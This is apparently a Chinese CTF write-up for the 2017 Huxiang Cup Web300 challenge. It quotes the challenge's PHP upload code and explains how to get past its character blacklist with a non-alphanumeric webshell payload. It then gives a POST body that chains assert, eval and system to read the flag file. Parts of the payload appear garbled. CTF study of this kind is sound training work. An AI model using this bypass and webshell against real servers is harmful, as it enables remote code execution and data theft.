2017湖湘杯-WriteupWeb300
打開就能看到源碼
<?php
ini_set("display_errors", "On");
error_reporting(E_ALL | E_STRICT);
if(!isset($_GET['content'])){
show_source(__FILE__);
die();
}
function rand_string( $length ) {
$chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
$size = strlen( $chars );
$str = '';
for( $i = 0; $i < $length; $i++) {
$str .= $chars[ rand( 0, $size - 1 ) ];
}
return $str;
}
$data = $_GET['content'];
$black_char = array('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',' ', '!', '"', '#', '%', '&', '*', ',', '-', '/', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '<', '>', '?', '@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '\\', '^', '`', '|', '~');
foreach ($black_char as $b) {
if (stripos($data, $b) !== false){
die("關鍵字WAF");
}
}
$filename=rand_string(0x20).'.php';
$folder='uploads/';
$full_filename = $folder.$filename;
if(file_put_contents($full_filename, '<?php '.$data)){
echo "<a href='".$full_filename."'>shell</a></br>";
echo "我的/flag,你讀到了么";
}else{
echo "噢 噢,錯了";
} 是要自己構造特殊的shellcode了,還沒有把路封死,因為沒有過濾如下
= $ _ + ‘ ( ) [ ] { }等等
就是時間問題,構造主要注意幾點
1.A可以用++進行計算,A++之后就是B
2.字符++后變成了0
3.''.[]之后報錯返回的信息是Array可以構造POST了。加上[]{}.沒有過濾即可構造最終構造如下,提交時候需要將+替換成url
$=’’.[];$=’%2b’;$=$%2b%2b;$=$[$];$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$%2b%2b;$_=$;$%2b%2b;$=$;$%2b%2b;$%2b%2b;$%2b%2b;$__=$;$%2b%2b;${‘‘.$.$_.$____.$}‘_’;
訪問得到flag
POST內容如下
=assert&_=eval($_POST[‘pass’])&pass=system(‘tac ../flag.php’);
<?php $flag="=hxb2017{51f759f39ac1f0cd5509b299b1d908f7}"; ?>
非常好的參考資料
https://www.leavesongs.com/PENETRATION/web...
http://www.freebuf.com/articles/web/9396.h...
學習了一波2333
